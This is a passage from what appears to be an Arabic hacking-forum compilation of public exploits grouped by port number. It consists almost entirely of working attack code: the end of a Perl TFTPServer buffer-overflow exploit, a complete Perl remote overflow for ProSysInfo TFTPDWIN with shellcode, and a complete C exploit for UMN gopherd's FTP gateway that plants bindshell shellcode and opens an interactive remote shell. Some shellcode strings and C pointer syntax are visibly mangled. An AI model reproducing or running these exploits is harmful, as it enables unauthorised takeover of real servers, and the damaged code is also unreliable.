"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x 32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x 9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\x ae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\x b8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x 0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\x e9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\x ca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\x a3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\x dd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x 06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x 3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x 58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x 38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x 2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x 74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\x cd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x 46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) {
# "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
# "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET;
}
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
# [2008-05-08]
69 ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD ([email protected])
#
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
use IO::Socket;
use warnings;
use strict;
if(!($ARGV[0]))
{
print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
print " Universal Remote Buffer Overflow Exploit\n\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
exit(0);
}
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\x af\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x 8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\x a8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\x 8b\x4e\x52\x8a".
"\x24\x43\xf2\x67\xf0\x53\xb8\x07\x24\x53\x32\xed\x 44\xc6\xe5\xc8".
"\xab\x8c\x88\x2c\xcb\xc4\xf9\xdc\x2a\x8f\xc1\xe0\x 24\x0f\xb5\x67".
"\xdf\x53\x14\x67\xc7\x47\x52\xe5\x24\xcf\x09\xec\x af\x4f\x32\x84".
"\x93\x10\x88\x1a\xcf\x19\x30\x14\x2c\x8f\xc2\xbc\x c7\xbf\x33\xe8".
"\xf0\x27\x21\x12\x25\x41\xee\x13\x48\x2c\xd8\x80\x cc\x4f\xb9\xec";
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));
if($len < 0) {
print "[x] Your shellcode is too big! Find another way :)\n";
exit(0);
}
my $overflow = "\x41" x $len;
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret ).($p2));
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect!\n" unless $sock;
print "[x] Connected to daemon :)\n";
print "[x] Sending packet..\n";
print $sock $packet;
sleep(1);
close $sock;
print "[x] Target owned!\n";
exit(0);
# [2008-12-14]
##################################
انتهينا من بورت 69
##################################
نبداء بـ بورت 70
70 Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit
/* [ UMN gopherd[2.x.x/3.x.x]: remote "ftp gateway" buffer overflow. ]
*
* by: vade79/v9 v9 at fakehalo.deadpig.org (fakehalo/realhalo)
*
* three years since last audit, code is a little more secure. but,
* still found a few potentially exploitable situations. this
* exploits the "ftp gateway" feature of gopherd. the gateway is
* intended to act as a proxy of sorts. between the server, and the
* client. the bug occurs when gopherd attempts to read a ftp
* list(LIST), and strcpy()'s the filename without checking the
* length. an example would look like this(including where to put
* the shellcode at):
*
* "-rwxrwxrwx 1 <shellcode> root 1 Dec 31 23:59 <long string>"
*
* to exploit this, there needs to be a fake ftp daemon of sorts.
* and, do to the nature of gopherd's "ftp gateway" support, must be
* on port 21. which means this exploit needs to run as root.
*
* when exploiting this bug, it is made moderately easy by gopherd.
* because, the buffer that holds the string is 8192 bytes, and on
* the stack. meaning the amount of NOPs used can be around 7500
*
* requirements(general):
* gopherd must have "ftp gateway" support included on compile,
* this is true by default. but, the "--disable-ftp" configure
* option will make exploitation of this bug impossible.
*
* requirements(for this exploit):
* the server must be running linux/x86(what i made the exploit
* for). gopherd must be started in the root directory "/",
* running with the -c command line option, or started as non-root.
* any of those three situations will allow for successful
* exploitation. this does not mean it is impossible to exploit
* otherwise. but, gopherd will be in a chroot()'d state. and, as
* of the 2.4 kernel series, i have seen no such way to break
* chroot. if it is desired to still run code, even in a limited
* environment, simply change the shellcode to your likings. also,
* the exploit must be ran as root, to bind to port 21.
*
* bug location(gopher-3.0.5/gopherd/ftp.c):
* 1800:int
* 1801:GopherFile(FTP ftp, char buf, char theName)
* 1802:{
* ...
* 1805:char tmpName[256];
* ...
* 1811:strcpy(tmpName, buf);
*
* vulnerable versions:
* v3.0.5, v3.0.4, v3.0.3, v3.0.2, v3.0.1, v3.0.0(-1),
* v2.3.1. (patch level 0 through 15/all 2.3.1 versions)
* (it is assumed versions before 2.3.1 are vulnerable as well)
*
* tested on platforms(with no code changes/offsets):
* RedHat7.1, 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686
* Mandrake9.1, 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686
* (tested on both v3.0.5, and v2.3.1 sources / no changes. this
* should apply to pretty much any generic linux, do to the amount
* of NOPs(~7500 bytes guessing room), and on the stack)
*
* example usage:
* # cc xgopherd2k3-ftp.c -o xgopherd2k3-ftp
* # ./xgopherd2k3-ftp localhost 127.0.0.1
* [] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.
* [] "UMN gopherd remote ftp gateway buffer overflow"
* [] by: vade79/v9 [email protected] (fakehalo)
*
* [] target: localhost:70 - localhost: 127.0.0.1 - offset: 0xbff$
*
* [] starting ftp daemon. (background)
* [] attempting to connect: localhost:70.
* [] connected successfully: localhost:70.
* [?] +GOPHERD: "ftp://x:[email protected]".
* [?] ftp daemon connection established.
* [?] -FTPD: "SYST".
* [?] -FTPD: "USER x".
* [?] -FTPD: "PASS x".
* [?] -FTPD: "PORT 127,0,0,1,128,35".
* [?] -FTPD: "LIST -F".
* [?] +FTPD: "-rwxrwxrwx 1 <shellcode(7800)> root 1 Dec 31 23:59 $
* [] waiting for ftp daemon to finish. (ctrl-c if needed)
* [] ftp daemon connection closed.
* [] checking to see if the exploit was successful.
* [] attempting to connect: localhost:45295.
* [] successfully connected: localhost:45295.
*
* Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2$
* uid=13(gopher) gid=30(gopher) groups=0(root),1(bin),2(daemon),3$
*
* note: when using your "local ip", do not make it 127.0.0.1, like
* in the example. it must be the ip you connect to the internet
* through. (not an local area network ip, or whatnot)
* /
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/ change defines at will. (cept EIPSIZE, not recommended) /
#define CODESIZE 7800 / part of buf[8192]/stack. (~-350) /
#define EIPSIZE 292 / riding a fine line, don't make too big. /
#define RETADDR 0xbfffe29b / center of NOPs for me. (~+-3500) /
#define TIMEOUT 10 / connection timeout. (general) /
/ globals. /
static char x86_exec[]= / bindshell(45295)&, netric/S-poly. /
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\x ff\x2b\x49"
"\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x 95\x06\xb0"
"\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x 5e\xb6\x88"
"\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x 25\x25\x3b"
"\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x 88\xd7\x27"
"\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x 98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\x d9\x85\x3b"
"\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x 86\xd6\x85"
"\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x 88\xda\x85"
"\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x 55\x0e\x98"
"\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x 06\x9e\x5e"
"\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x 06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x 3d\x04\x37"
"\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x 85\xe0\xa2"
"\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\x a2\x55\xc0"
"\x6e";
char ftp_ip[64+1];
unsigned short ftp_port=0;
pid_t ftp_pid=0;
/ return address offset. (arg3) /
unsigned int offset_ra=0;
/ functions. /
char geteip(void);
char getcode(void);
unsigned short ftpd_read(int);
void ftpd_handler(int,char );
void ftpd_list(char ,unsigned short);
void ftpd(void);
void gopher_connect(char ,unsigned short,char );
void getshell(char ,unsigned short);
void printe(char ,short);
/ signal handlers. /
void sig_ctrlc_wait(){if(ftp_pid)kill(ftp_pid,9);}
void sig_ctrlc_exit(){printe("ctrl-c abort.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}
/ begin. /
int main(int argc,char argv){
unsigned short gopher_port=70; / default. /
unsigned int i=0;
char gopher_host;
printf("[] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
"verflow exploit.\n[] \"UMN gopherd remote ftp gatew"
"ay buffer overflow\"\n[] by: vade79/v9 v9@fakehalo."
"deadpig.org (fakehalo)\n\n");
if(argc<3){
printf("[!] syntax: %s <hostname[:port]> <local/your"
"_ip> [offset]\n\n",argv[0]);
exit(1);
}
if(!(gopher_host=(char )strdup(argv[1])))
printe("main(): allocating memory failed",1);
for(i=0;i<strlen(gopher_host);i++)
if(gopher_host[i]==':')
gopher_host[i]=0x0;
if(index(argv[1],':'))
gopher_port=atoi((char )index(argv[1],':')+1);
if(!gopher_port)
gopher_port=70;
if(argc>3)
offset_ra=atoi(argv[3]);
printf("[] target: %s:%d - localhost: %s - offset: 0x%.8x(+"
"%u)\n\n",gopher_host,gopher_port,argv[2],RETADDR,offset_ra);
signal(SIGINT,sig_ctrlc_wait);
signal(SIGALRM,sig_alarm);
/ start ftpd, as a different process. /
switch(ftp_pid=fork()){
case -1:
printe("fork() ftpd failure.",1);
break;
case 0:
signal(SIGINT,SIG_DFL);
ftpd();
_exit(0);
break;
default:
printf("[] starting ftp daemon. (background)\n");
break;
}
gopher_connect(gopher_host,gopher_port,argv[2]);
/ gotta let the ftpd magic happen, plenty of time. /
printf("[] waiting for ftp daemon to finish. (ctrl-c if"
" needed)\n");
waitpid(ftp_pid,0,0);
signal(SIGINT,sig_ctrlc_exit);
getshell(gopher_host,45295); / defined in shellcode. /
printf("[!] exploit failed.\n");
exit(0);
}
char geteip(void){
unsigned int i=0;
char buf;
if(!(buf=(char )malloc(EIPSIZE+1)))
printe("ftpd_read(): allocating memory failed.",1);
memset(buf,0x0,EIPSIZE+1);
for(i=0;i<EIPSIZE;i+=4){(long )&buf[i]=(RETADDR+offset_ra);}
return(buf);
}
char getcode(void){
char buf;
if(!(buf=(char )malloc(CODESIZE+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(CODESIZE-strlen(x86_exec)));
memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,
strlen(x86_exec));
return(buf);
}
unsigned short ftpd_read(int sock){
char buf;
if(!(buf=(char )malloc(4096+1)))
return(1);
memset(buf,0x0,4096+1);
if(read(sock,buf,4096)<1)
return(1);
ftpd_handler(sock,buf);
return(0);
}
void ftpd_handler(int sock,char buf){
unsigned int addr1,addr2,addr3,addr4,port1,port2,i;
/ clean up for display, changes nothing critical. /
for(i=0;i<strlen(buf);i++)
if(buf[i]=='\r'||buf[i]=='\n')
buf[i]=0x0;
if(strlen(buf)){
printf("[?] -FTPD: \"%s\".\n",buf);
if(!strncmp("SYST",buf,4))
dprintf(sock,"215 UNIX Type: L8\n");
else if(!strncmp("USER ",buf,5))
dprintf(sock,"331 login ok.\n");
else if(!strncmp("PASS ",buf,5))
dprintf(sock,"230 access granted.\n");
else if(!strncmp("PORT ",buf,5)){
sscanf(buf,"PORT %u,%u,%u,%u,%u,%u",&addr1,&addr2,&addr3,
&addr4,&port1,&port2);
memset(ftp_ip,0x0,64+1);
snprintf(ftp_ip,64,"%u.%u.%u.%u",addr1,addr2,addr3,addr4);
ftp_port=((port1256)+port2);
dprintf(sock,"200 PORT command successful.\n");
}
else if(!strncmp("LIST",buf,4)){
dprintf(sock,"150 Opening connection.\n");
/ send the fake file list, the exploit itself. /
if(strlen(ftp_ip)&&ftp_port)
ftpd_list(ftp_ip,ftp_port);
dprintf(sock,"226 Transfer complete.\n");
sleep(1);
/ nothing else of importance. /
close(sock);
}
}
return;
}
void ftpd_list(char ip,unsigned short port){
int sock;
struct hostent t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(ip))){
if(!(t=gethostbyname(ip)))
printe("couldn't resolve ftp_list hostname/ip.",1);
memcpy((char)&s.sin_addr,(char)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr )&s,sizeof(s)))
printe("ftpd_list connection failed.",1);
alarm(0);
/ the exploit itself, what changes the EIP. /
/ i just put the shellcode where the user/owner /
/ of the file would normally go, goes into the /
/ fat buf[8192] buffer, yummy. /
printf("[?] +FTPD: \"-rwxrwxrwx 1 <shellcode(%u)> root "
"1 Dec 31 23:59 <eip(%u)>\".\n",CODESIZE,EIPSIZE);
dprintf(sock,"-rwxrwxrwx 1 %s root 1 Dec 31 23:59 %s\n",
getcode(),geteip());
sleep(1); / not needed, safe call. /
close(sock);
return;
}
void ftpd(void){
int ssock,sock,salen,so=1,i=0;
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/ just incase used multiple times, good habit anyways. /
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void )&so,sizeof(so));
/ not everywheres. /
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void )&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
/ must be default, gopherd limitations. :( /
ssa.sin_port=htons(21);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr )&ssa,sizeof(ssa))==-1)
printe("could not bind socket, ftpd already running?",1);
listen(ssock,1);
bzero((char)&sa,sizeof(struct sockaddr_in));
/ some things i just don't see the reason for. :/ /
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr )&sa,&salen);
close(ssock); / close server socket. /
printf("[] ftp daemon connection established.\n");
/ welcome! /
dprintf(sock,"220 FakeFTPD.\n");
while(!i)
i=ftpd_read(sock);
close(sock);
printf("[] ftp daemon connection closed.\n");
return;
}
void gopher_connect(char hostname,unsigned short port,
char myip){
int sock;
struct hostent t;
struct sockaddr_in s;
printf("[] attempting to connect: %s:%d.\n",hostname,port);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve gopher hostname.",1);
memcpy((char)&s.sin_addr,(char)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr )&s,sizeof(s)))
printe("gopher connection failed.",1);
alarm(0);
printf("[] connected successfully: %s:%d.\n",hostname,port);
printf("[?] +GOPHERD: \"ftp://x:x@%s\".\n",myip);
sleep(1); / had problems, without a delay here. /
dprintf(sock,"ftp://x:x@%s\n",myip);
sleep(1); / doesn't really matter, but to be safe. :/ /
/ leave gopher socket open, for the duration. /
return;
}
/ same getshell() routine as usual. /
void getshell(char hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent he;
struct sockaddr_in sa;
printf("[] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1){
printe("getshell(): socket() failed",0);
return;
}
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname))){
printe("getshell(): couldn't resolve",0);
return;
}
memcpy((char )&sa.sin_addr,(char )he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[] attempting to connect: %s:%d.\n",
hostname,port);
if(connect(sock,(struct sockaddr )&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",
hostname,port);
return;
}
alarm(0);
printf("[] successfully connected: %s:%d.\n\n",
hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1){
printe("getshell(): select() failed",0);
return;
}
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1){
printe("getshell(): read() failed",0);
return;
}
if(write(sock,buf,r)!=r){
printe("getshell(): write() failed",0);
return;
}
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)
exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char err,short e){
printf("[!] %s\n",err);
if(e){
/ don't want to exit with ftpd still running. /
if(ftp_pid)
kill(ftp_pid,9);
printf("[!] exploit failed.\n");
exit(1);
}
return;
}
// [2003-08-22]
#####################################
أنتهينا من طرح 4 بورتات بورت 42 و بورت 53 و بروت 69 و بورت 70
ارجو حفظ الحقوق لجيوش الهكر
تحياتي
#####################################